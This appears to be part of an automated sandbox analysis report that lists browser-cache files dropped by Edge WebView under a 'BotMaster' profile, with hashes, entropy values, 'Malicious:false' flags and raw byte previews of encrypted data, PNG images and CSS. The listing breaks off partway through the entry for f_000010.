                                                                                                                                                                                                                Preview:...........i{.F...}.......%...$..<.%'.-.$'.M........h....<..>.&T. %..{.s..."...U......_..~.....'....?..Z..S.y...gG.4(.,...o$..\..i.ufI..b..{.[.4.Q....v./.H\.$.'.w*...^..G.HF..~..o...$.....i..S...c...g...]9...t..EIS..8...di;.._.Y.Am...A..rJJj.'...}....hZ..eVu.....#....e.Oh:+...r.g.....vI..<.mK.t;.H..Sf.zC.UI;.....N.v..vU..}. ....v;..Uc'._WqNC..We'K...7.gu.9-hZ.-..a..c.(&.2;/.8.......^....6Ej0y....3..x.K.;.u....l.a..".F..9.qd...;.e..hl.4.%.&..l....bI.`.Z.....=.t.(I..Nbi..qk.,...#.$9Y..a'.:iVv.......g...C.o...........lT.'.r....4-....B|.......;....q8.].,(........%....w...9)..........x...6'l..k.u...+/....z..M.zG..O.M....,.*!..#.n"....p4.L..G...+..;I..f...I......u.2].N.0........l.l..6X..-/...V.N... .g.u.Q?K.....*.9.NU...........c..<..$.Bq..#{.....$I.$. K.2_.e..2..;._$.*.!... ..6*....'2..S.-i^..Zzde)..Bw3Z.Z..8.F.T.T.._D>6.y~..^..:......".&..N.T..l6.C:$....TP.6.^...-........<.}@.xE.t.'.>..7..&..Yx....x..6........S.KL..8..8....'[Q.-.k.z..l.q.J..

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Cache\Cache_Data\f_000005

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):233729
                                                                                                                                                                                                                Entropy (8bit):7.998615456017633
                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                SSDEEP:6144:4gauD7UV2a/nRMUASuVRS3J4rkt7N/8+8UVt6lSal9kfPu:rauDoV7/ZnuVx4t7t8oKBP9
                                                                                                                                                                                                                MD5:25CE27EC3B2E674CB3538668466A0887
                                                                                                                                                                                                                SHA1:ED63C70583F774BD050DB6C43C6036194791C715
                                                                                                                                                                                                                SHA-256:952D42F0D09686F9F00345F34F3EA21709AFFB4589D69985C5FD9793B6974E5B
                                                                                                                                                                                                                SHA-512:F52C7F177DDA6D908C9CF7DFB775E11886C70AEBC70FF99B1F20989BC25CDD615D3A3CF95D613D3BC7271C809D1CB1DA0437AB362E0ECA449C6BB80D9F5F3711
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:'Wv.B...@0=.....!....g<...H..q.....@UUUUMI.x....*..O~.._..w..._............??p.p.....C#c.S3s.K+k.[;{.G'g.W7w.O/o._?......."SY..^.=]..~..L....0*A.p..:6c......K..{%+zGe...N{..._28..zB...1.@...p.eP.......=..5...x.m.l2y.&o.gJ....K...ql...j.......b.G-Z..8!..u.H<.keg2..G..M.1.h.........?_p.......!.i.@......a_c.Kr%.Gb....y..j...U65E $L..b..+.l?@.#.I.]........u.....w...%.#G.'..E....r..N...w~....%...).q.Ay.V.S.W...7..{..r.n...H..9-.,.Q.#.a.@(.h.m....R...)y...wyc.....N....>...7....m5..6...J.0f.2..J].l..*..e..?_ij..b.....v..H.[.$C..+&q.`O....v.......OxH..i.D.k.d..$'YO.W5..7..j.d....HcB.g.'`".X+ge;...f...3x...._.......b(g'.a%N<.8.3^.it|a...S..hz.....}}..N=F*...esn8.$.Lg....5..C.....G.$........./...Hq....(..<.3.$....x......hI........._..G...f.e'.....U(...+..!l9QQ. .4......~.s\..$..t..../.kE..[ ..j.Fx....;.L..'.K...V..}.5.}Z..t.+....Xn..K)(.a...X:`...@.h...a,A!.....2...C|!.Y2.F....bk.p .......s...'...|....f...;00s......=3...4..4w ............../a..Z...V.A...,.

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Cache\Cache_Data\f_000006

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:ASCII text, with very long lines (49290)
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):135554
                                                                                                                                                                                                                Entropy (8bit):5.337600269074076
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:1536:nPbIZq0tBMuS1nakvgetUr6e2vpK/g2ocS2Nfm52M2MHOz:TIZq0j/ybUHnz
                                                                                                                                                                                                                MD5:7C7A5A3153FC479986F0FB60643802EC
                                                                                                                                                                                                                SHA1:9238724FF913010D8604101A8934116E430500F5
                                                                                                                                                                                                                SHA-256:6F2D48872296DE1CFA349C11DA9EC925D701C58B5A278A44BA7AD26F95BBB59F
                                                                                                                                                                                                                SHA-512:5BCA180386B69FED740B85B2E267BEF49C9E11D3BE5DDFC24034E3A9509F5EFB6C848085186A5A96DE4A88023BA6EC741FDC048798C70546A43C6D21844FD67C
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:form{margin:0;padding:0}label{color:#606770;cursor:default;font-weight:600;vertical-align:middle}label input{font-weight:normal}textarea,.inputtext,.inputpassword{-webkit-appearance:none;border:1px solid #ccd0d5;border-radius:0;margin:0;padding:3px}textarea{max-width:100%}select{border:1px solid #ccd0d5;padding:2px}input,select,textarea{background-color:#fff;color:#1c1e21}.inputtext,.inputpassword{padding-bottom:4px}.inputtext:invalid,.inputpassword:invalid{box-shadow:none}.inputradio{margin:0 5px 0 0;padding:0;vertical-align:middle}.inputcheckbox{border:0;vertical-align:middle}.inputbutton,.inputsubmit{background-color:#4267b2;border-color:#DADDE1 #0e1f5b #0e1f5b #d9dfea;border-style:solid;border-width:1px;color:#fff;padding:2px 15px 3px 15px;text-align:center}.inputaux{background:#ebedf0;border-color:#EBEDF0 #666 #666 #e7e7e7;color:#000}.inputsearch{background:#FFFFFF url(/rsrc.php/v3/yL/r/unHwF9CkMyM.png) no-repeat left 4px;padding-left:17px}.html{touch-action:manipulation}body{back

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Cache\Cache_Data\f_000007

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:PNG image data, 3566 x 830, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):29526
                                                                                                                                                                                                                Entropy (8bit):7.868689249946656
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:768:ozDd1sA/tACcWTZ72qa3yX22xUi5GNvnDH5vp1a4:YdL/fTTZ7X7XIUGNrJp1a4
                                                                                                                                                                                                                MD5:215698B8F763CE612C41964F0F14E507
                                                                                                                                                                                                                SHA1:226059CD8896A857DCA6437F29F58E9F682E4D00
                                                                                                                                                                                                                SHA-256:2FE76A197D3891F7848604C87A945231C4DD2E39A74BDAED45AC5648A0DD72E2
                                                                                                                                                                                                                SHA-512:3DE592395D0D81E928E465A188F58BAF28F4A043C65A651421122C266355471B602C3141D0BF54FD537B78FCDC07A9D618915B6D95A61B4B853418B9DCF6067C
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:.PNG........IHDR.......>......r.....3PLTEGpL.................................................A.*....tRNS... ..`.@.0..Pp6.4_..r.IDATx^..Yv..@Qp..p..Wk.m..k......{....N....X...H..._.........!...{l).........5/..4..5.T......Xs))...bJ.|~......2.X...O.>....|.i./5....1.....bm.......`...k..p..........7.....|.c..m_..K...L....G.....X.a.7..s......zG.....|...L.7..C......a..J...... ...+.......`^.X...5<....Z...qx......s......b.....!.G.......^........7]|...Z.N......S|....Z...'.....2V~z./........+...z...x..v.G.....5...8.......P...5......{.=....X..._....,[}?b..:.........G....,............2.......X;cO'...\b.p..^...`...`[B.............~.b.C.................{....@..>....'.....T?.....pg.x.....@.9....0.X_.1.....p...R.......k3...#..............N....Z.l...X..(......`M.7>.......6..~.....k.Hk......'.........N...s.......`:..P......b......Vo.a.?...P.]...c...y.7.1....../...%....=.d.....0......0....,...76........K).3.....7.MJ)..s............`..!mn......R..-...s.X9.r.....h....o;.+W..

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Cache\Cache_Data\f_000008

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:PNG image data, 3566 x 830, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):29465
                                                                                                                                                                                                                Entropy (8bit):7.8573324538118525
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:768:zFbH40yJdmqn29y+ta9KLmPAtdl2JwnhSwyS6RV8KSSOeq:BH4vdnn2vLqAvUUSwy5RVFTq
                                                                                                                                                                                                                MD5:6BD7AAD7D4B0DC00D4ADFDF6F0CBF399
                                                                                                                                                                                                                SHA1:3445447C81CE085CBF3165822DA472156A1949ED
                                                                                                                                                                                                                SHA-256:0DBCD72A5BCFD55A91EAFA6C362C67E1D434016FC85308E17F99AF100565BE0B
                                                                                                                                                                                                                SHA-512:8DB874A322B65BA06D7BE3B41BF469CBCE7FBE496666D077E6FE02DEA079C2EA4C9A653EAA7CA48F5BF360BE1F1ED4B80AD8FCF94697D497BB59B6F710E7B28C
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:.PNG........IHDR.......>......r.....3PLTEGpL%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.foS.+....tRNS... ..`.@.0.pP.X..Z..r.IDATx^..Y..7..P..$.#...v.O.B..V....9...."N.._[.p._8..e.......r.k.}.#...#...n........T_....~........-....>...R..Z.w.k."....0....^u.../...@..z..w.S.>....=...X.4......y:j;.zLC.;.......U.5.)~....y.v=K.w......\.v]......%.v.5......Q..)......0o...g.[......ni...{<......v..6.s.......?.x....4.c{...........gZ......0l}.^......'.....z....@.~.z.{\.......0v%.....tc.5.c.+......~..zg|...Sm..K-u.....z..%.......85u..............s....0..9.3.u.....}...~..........Y.....>Tg.....]..9.....N...!.......5..#..@?.......LK.Z.|.........@.......=...........a.......XJ|....}iw.-...@..s.....P.....B...C..#.....<..`.)^...`........P.v7J:............. .vV........>.......v... ..=........8.....8............P.v-,{.......s..u..@E.......`..C.....6..#.....F{.?.d.....v..........|....=.....W{}..b.w9.....Rk.9o./s.V..s>j.w...........R...R..k].....`....R.....o......t....<.._

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Cache\Cache_Data\f_000009

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:PNG image data, 296 x 586, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):117847
                                                                                                                                                                                                                Entropy (8bit):7.9963394835100665
                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                SSDEEP:3072:A8YsqfEsO0XA/cfsrBhmlziPiDzSEvK/3mvO/voQh:utEb0Q/cYESE43m2vom
                                                                                                                                                                                                                MD5:B881E73E3A3395146BB769B920988F9E
                                                                                                                                                                                                                SHA1:DF275A1DB5DF9D48959DC38BBC1B78002C81F24A
                                                                                                                                                                                                                SHA-256:AC0E185E6F5790DE90A5E27F7947F761E20501FB63AA832830E64094AC994387
                                                                                                                                                                                                                SHA-512:D8516D02F4893A49CFA8AB91DE52AF1D4081645D3964B66C03C6BC5C5A7C3E2EFE930257693F052EC9E3B22BC2161AF5B771C6B0F89221BD8D65261CC6BEB20B
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:.PNG........IHDR...(...J.......(.....gAMA......a.....sRGB.........PLTE.....".."...........!.. ........"........%$.&& (... .#..&.....!...& "...#.!,"*.."..!...1&+sto..`...+.#..a..&...rus+$%....&.....a.|b.{X...R@0..\swv<-/..b.uV. )...}\.}].x]>?S...9=M5,/.}a.|U..Z.y[..f\J71$$..ekZC.sWu{z..eprq.jO.jG.nJ|jK."+7'+K:-qY>CFS.}U..g.yZqaD..fwdF..*}oQ.tNqbKdN9.dB.oQ..Y*6L.vV57FoqmUF6.eJ,/FD4)zkR...p[F._?.|a.'?jT?..m..l.hB..n..h.yR..].qO.X<.^H%&,.O7eW@aQ?l=/..Zu=/e5,\L=..\3<T{pY.oGzC..[=...Y9.rS.wN.O5;-&.a?|I5.mI#/EwdM2<K~dK.$/.|U.nR.P>ZE2@E\...uhK$*9uD8B%&.pH.eC..s.}h.G1T+'.wL..a,-;..j.ZFv]@8BW..vv^H.pI.vP.S6..dK'&46N.hJ.4A. 5.U@.eN.yN.v_.(2..m9!"]-(....+/@@H^5.B35..p!#2kA:..x..S..1.TCqohJL\+'2.G;_;8U20i^K|_B839m5*....{_.....\..bJ.0msurhU.hF.kU.%:eTH.zW.zRyMA..[K<:RSp.\OmO9..|...UTb.eV.{hfgk]^nENl...RLMbe..n]U]}.\S.....nc]Y.~x..........:... .IDATx.,.Oh....erZA"v:J.l9T..:4...{.aa..s_&.@....|R.`6!.[L..J..ad]b.,s......L.D..s.".Y.&.D.w.A.{..4...._...o.N.....e..`<..8<..Y...EY...5..,.p!..

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Cache\Cache_Data\f_00000a

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:PNG image data, 872 x 124, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):26368
                                                                                                                                                                                                                Entropy (8bit):7.970439192018936
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:384:HaNexlDH4MZVn/VTT7rTwXqNXr+Oj6jkqzDcwgEGwt9BYiB0Ilb7OD/az:HBJZJB30SPq/IEVtEkJJKDSz
                                                                                                                                                                                                                MD5:013061AED0C306436D7A0FD40048A9C9
                                                                                                                                                                                                                SHA1:5942AC18FC3DB66A0F5FA5787FDAAEEF3862F48F
                                                                                                                                                                                                                SHA-256:B0DEC6CEFAC7BFBBEBC24EB5A22EF9502C55D5615C0EE15E66188A2E65049930
                                                                                                                                                                                                                SHA-512:34BDDC3ADF79D883CB82A85F581BF195E2DFFF7F93D5309848A90067AA7BC19FD034E370B76DEFAE1BD92D4A8CC0CC5E7BFFBEB001426E5B105F1E0B96B36EA0
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:.PNG........IHDR...h...|........-....tEXtSoftware.Adobe ImageReadyq.e<...(iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 7.2-c000 79.1b65a79b4, 2022/06/13-22:01:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 23.5 (Macintosh)" xmpMM:InstanceID="xmp.iid:70F71703935811ED82A9F1AC6A1BF217" xmpMM:DocumentID="xmp.did:70F71704935811ED82A9F1AC6A1BF217"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:70F71701935811ED82A9F1AC6A1BF217" stRef:documentID="xmp.did:70F71702935811ED82A9F1AC6A1BF217"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.P.;..cnIDATx....dwu...-...{f-.U.*.*m .....l.......i..M..4.n..x..L..66...q.l.x....b..F..H....Z2.r.....Edee.P.T

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Cache\Cache_Data\f_00000b

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:PNG image data, 872 x 524, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):187074
                                                                                                                                                                                                                Entropy (8bit):7.976376627732109
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3072:0RKYOeKhdbux4AnE5WJ+ZoQEVQrAzAY8voV+E7r1mhjdjyll7wUGBT:00ik04AES+eQEmrcRl+E7rqdOl5GR
                                                                                                                                                                                                                MD5:459B5EFD6A6AD688354F6D75865A374E
                                                                                                                                                                                                                SHA1:D416F2134F3DE450A9082ACEF1D2F37AC4CC6E93
                                                                                                                                                                                                                SHA-256:A9BB667C1E5D52575DAAD6A1F551076491FD83FD85322588811FFD3BF8C08787
                                                                                                                                                                                                                SHA-512:B45453BC9BD22919506B9B5C8AC4B0CB23A151125904D3D57DA7571434AA13A8A63225F757152AD767F2A2D0A43E11F1569968E6CF37D29282843D4F9DD752E1
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:.PNG........IHDR...h.................tEXtSoftware.Adobe ImageReadyq.e<...(iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 7.2-c000 79.1b65a79b4, 2022/06/13-22:01:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 23.5 (Macintosh)" xmpMM:InstanceID="xmp.iid:347B783D935911ED82A9F1AC6A1BF217" xmpMM:DocumentID="xmp.did:347B783E935911ED82A9F1AC6A1BF217"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:347B783B935911ED82A9F1AC6A1BF217" stRef:documentID="xmp.did:347B783C935911ED82A9F1AC6A1BF217"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.Q.....0IDATx..I.%.u%......!...LL....H...J..\h#.i.......j.mF.....B.m.6Zh....L.F...QT[.9t.@. ...j.9c.........

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Cache\Cache_Data\f_00000c

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):1554266
                                                                                                                                                                                                                Entropy (8bit):7.999317969130873
                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                SSDEEP:24576:hZuFTO1+gYizKWjAcwE66dXrXlmgimNfSIhkLSiuvoL+BAGO3H327mQqtNBXxaAL:TE6+MNDXgzmNfSckGbvoL+1O3X2itNl7
                                                                                                                                                                                                                MD5:8002EDB3DB5715A9A7B96835088417A3
                                                                                                                                                                                                                SHA1:4A6195CF04DE05A329BF77BF02FC9B869C450673
                                                                                                                                                                                                                SHA-256:83A969883277C088A063E780EAAE44BCAB2EF081DA9116945F84CF124BF9E376
                                                                                                                                                                                                                SHA-512:1BA7BD6C81455375C697A9DFDF3FD3EAA4E17583ACAD3EF5C911389C51C8B86BE1477A9EE50BC9E3E9E6AD37A60826826C2D547A11F695815D28FCF364507A96
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:....kP.}...D..L...{.<T6.aT.....=ls.....@.<............p.........?.#?..?.3?....+.....;.....'.....7.........o....O.........9 ..l.2.C#c.S3f..`.e+V.Y.a.m;v..w..c'N.9w..k7n....g/^.y...o?~.....:..?_.]"Q...>t..,.?bjE.B.Y..._E..J.0v.J..C).....m...g.9Qq....4.}..R..~...H.'.....Iww.....!.Z"R!..!W.W.....{.3K...ip..<7....x...R.R#..5.0.l......._.7U)j.........".Q.JD..tq..fk.X...|~.O..~Rf.'..)u....[Xt.X...ba=,\.....w..cm.-..f...n.\..2.D.T..T....!x..aM-..oA.Lq...{t.lG"..VxE.y...eZ..vC ..T.J.-f........(KQ.e.)..|P%..}5....5.....y.....h..LyE:.f.gN.Q *jT!..Q...j..../....[c2..\.m.l.b[r$9.,.....r...<..%......._..J&.$.(...2.}..X.W..3...X.).._..W....;v...8R.#..t..`..T..WE'....<A.v...m..b9..\I.!@..b.z.2..r.y....R.Z!.W.......x..<.Yo..Yf......1^k...H7-.{=.E"31E..$X.<.z..c.Zf.....I^.f...d. -.F@..K..}.j..w.|T......s.......!@;_.?....P9.4....c0+(..Yjx$@...a7...<R;.....7.Zm....[.=..N....~Y...FM.......j..hJs....-.?.R.}.[N...R.j=.."7%....6.d..o...].?.._.r.{......Q

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Cache\Cache_Data\f_00000d

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):61005
                                                                                                                                                                                                                Entropy (8bit):7.995327831326715
                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                SSDEEP:768:+aAZ9EU8GJsCETSpWtVsCp+CbmCm7CmVh958GzQSpaDGR0X1SkHyAr8U5E98AfY7:+amGrMrASmVsc+CJIh954So6W4meqA/0
                                                                                                                                                                                                                MD5:B01468F7E6C62324751BAC6A73557EF2
                                                                                                                                                                                                                SHA1:53CCE74DED414D63A37818B3E93C90EF2711FC7D
                                                                                                                                                                                                                SHA-256:6B8B6C775D4EE1883370F12573E9CBDC84C0E10BFCDD84C2D5A043E606035720
                                                                                                                                                                                                                SHA-512:28CB21A4CFF2FB1905191A0A8CB6FD45511DC2AF36D7B7BE316EE63155BF76B38E1105DDE5D82C0ECC2C0B92C1F7CBDCDE0C1562C7505E8E7D566F4F77A60F50
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:'...E.q....?......=..).........l..x}~.....~;...B.M^B...../KK..s{....!43.\...#...I,..3...om..m.....7..3...$..~...W.F.-.q=..$aKB..d.ay.}.Jj..U. D.9...D...(...M.k]D;F...q!...5...q.17....L..@P. (.......s.}U|.U.*....H.. ./H...)....X.T@..R..^k.....U.:.Z....u.5...B.y...>.K...J.w.C......^...8.!....5.\w..u.e,.."}............!.!0z."...........,-/..R..D+b......7.{......a..H....g...s..<....5..Z...%.`....ct...nI..m.1W<.........]_V.M..a..J..~..nL.D..6...U..-{v.\'...?H.m....FUO...<..T.j.Y...j5.@..&y.......d...,..iV.......0......Nt.#.....]...#2.......S.q...'3`C"..r..........*r..`zzz.3..U..1....9.T..c_$...44w..5z.......N3..*Y)/.Q.fu%.^...P..j..Z.QsH7@.o.4ha..i..%"....\.....)..rid....B...=q..L7r.g..t#GR%{..*..W......C..D...j...R.y.tf)$.ck..6....QQ...d.!..6..g..(..IG6Yr....L...y..1.....8.#.DD......Z.>.....U6...R".N.t|...Y.v.H..5...N..V.%O...dZ...B..8.1...C.X<..{~..e..qFD!Y,.....AM.......<.\..D.i~.C..u.yO.d.X..oX...,....H........8M.'....N.x;"...o.^.~.bD.....X

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Cache\Cache_Data\f_00000e

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):17785
                                                                                                                                                                                                                Entropy (8bit):7.985389016638041
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:384:TqKN3pXVb+FeRK2usSzjSDvJOh5i2B0IZxpfKA:TqKN3aFMKuu6vJOvPB0IZxF
                                                                                                                                                                                                                MD5:F5AD1F305492CC14C7B1B6D1E67486AB
                                                                                                                                                                                                                SHA1:51307AB68D8DAED448955AC33349FC1CAB62A3DB
                                                                                                                                                                                                                SHA-256:A1A2DAF2DCBA044B242FE4DB44526A00AB62E3746C2AD1B58947033850DCD364
                                                                                                                                                                                                                SHA-512:AC7042F1026888AA2EE7B03BBEA6FFEF7DFE8050C148667BAEA17E6ABF6F206778C02869052563C602F7CDF45566F4ECAFAFFC6500860FBBEACCF23BCA3391A0
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:'..Q$..z("I.....I=.............20v.......nY.."T3y..ao.#&,|vIXy...3gcv.]yEs.T..}.{....y.O.!......AN..,9..g...J.~.........;).$3.....^..*.9....$....$ DP...>...t.....j..........M....."/z.((Y. ~3S.).,.e.G?$.........A{P..._.:|...dg.x..M$D.....:WN.........oSWIG.%(..,4.1..C........U...g....P.#p..%2.Rtt...L...8[.W..!.a.h.S!$...w.._.;..Y....e%.A9...K3....u..... .._...9....[~.g.T..$...Q.....)i............Q.M6..g.....4.....]....~..DV.............'....9f.....P@k.w6"D.....6.b.V.......,.K:U...b....6+...#..7r.........;.T".X......~.W.....!.[.}w..*......\L.%....."W..E..s.^&.....(M.#rUR...w.)H.-{.f6.OLe-.X.....Gm.<....8.......X,.A...*1M.&s..*....0.bze.....V.l..V.sh..z2.h.lM....&./@[.P...A...4.......#^.cT.......}....m.s...R..Q.'.K.._..AF.R..@).........j.z[[S..A$.O...(D..kq.cB^UB.Sj.6...b<l(.*-....U.zRW..$.dJ.%./V...^7.|...]/....A.0.u.....W.<........2.=.U....!.c....=[X..f..OC...d...KS.qL<..%.XRI`l..8w..r.......4Y..N6+..\gs}Su..h[uk[S.1._.F.<./..."..m.u..

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Cache\Cache_Data\f_00000f

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):30388
                                                                                                                                                                                                                Entropy (8bit):7.9913078115727885
                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                SSDEEP:768:PzZ2a9GmPYLF91/ALp9heZnh67n57NbuCBbteXU:PzZ2aQWYpLAIePneE
                                                                                                                                                                                                                MD5:A911176632F31D16659CCE7C8F96C60F
                                                                                                                                                                                                                SHA1:42E26BC9ADD2A7295FC386C81391CCA02D5D6271
                                                                                                                                                                                                                SHA-256:A0D820956479E103A382E40DCA56FEFCC8342B4351D0AC5985408006AAE98DC8
                                                                                                                                                                                                                SHA-512:F5AB7DF910AC90145C186FD301C490EE1B5C16721AD193EB5AAF9280DA6CC89E76BEAC980116EF8DD8DE31687119BCFF602253683A485A16AA6E1A385F32C5BA
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:. %..d...@3p\.u.-..o_....J:...{..IO.*.Xy:...@b.... Z...f.....Z.e{..I`%..>2...17...ZC.....@".H$.r..s....=.$.."......0,6a.H...k...8.$.d..q6.5Q.=Y..o..[+ADDx.KM.....6.....c..........._3...7Q.....].ea.d..........8]._......]....A......v.i..Z[Jm.]BUhkQ..)|....}AN.........R.-WF..\......b..T+....n....M.\y...D^..5..>..I...K.P.<M.D.%...k..y!.......r...su.....z...n...=..).6...E.&.n.5<.].~^.?.b...).;....c..[.^...q.'..B.n!.P...~.....7.yr..E..o....T...O.L.@51.....J.r..R.cANV.#...Qt...=.....h&...95...^UT...b.<........g...;.R.{q.....Vi.z.z7...H..j..S)...}.............].0.i. (............3....P ..zg..D.-H........m._..r#.>M..........^...%.....J.....2..B..ifVjH.....L.lF..Z./.f...!.x.VtJ..Gd.sp...$+...-:\{..........&..4..Z~9...... .+...7 .k.q|.F.}.....(...Jnu9W.8..@Y.j.O........`E.?4.P.%.}..`...h.1..&.mM..X...(.....g5~p.99...2.k....o.....1......q..%....P..9.-..o.9v...C....A...e....(E6.t...U.....W.y%\.ko+Z.h.Q./...T...?26.p_../..... .}...2X.3./h....N!._?.q.<p..H..

                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Default\Cache\Cache_Data\f_000010

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):41677
                                                                                                                                                                                                                Entropy (8bit):7.993642166859117
                                                                                                                                                                                                                Encrypted:true
